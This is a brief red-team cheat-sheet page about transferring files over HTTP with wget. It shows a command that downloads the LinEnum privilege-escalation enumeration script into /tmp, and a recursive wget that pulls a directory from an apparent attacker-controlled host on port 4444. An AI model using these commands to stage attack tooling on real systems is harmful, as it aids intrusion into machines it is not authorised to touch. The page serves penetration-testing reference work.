Operator On The Wire
Join
← Back to Knowledge Base
RED TEAM / FILE TRANSFERS / HTTP

wget


# Single File Download
wget https://LINK -O /tmp/LinEnum.sh

Recursive WGET


# Recursive Download
wget -e robots=off -r -np -nH --cut-dirs=1 http://1.1.1.1:4444/dir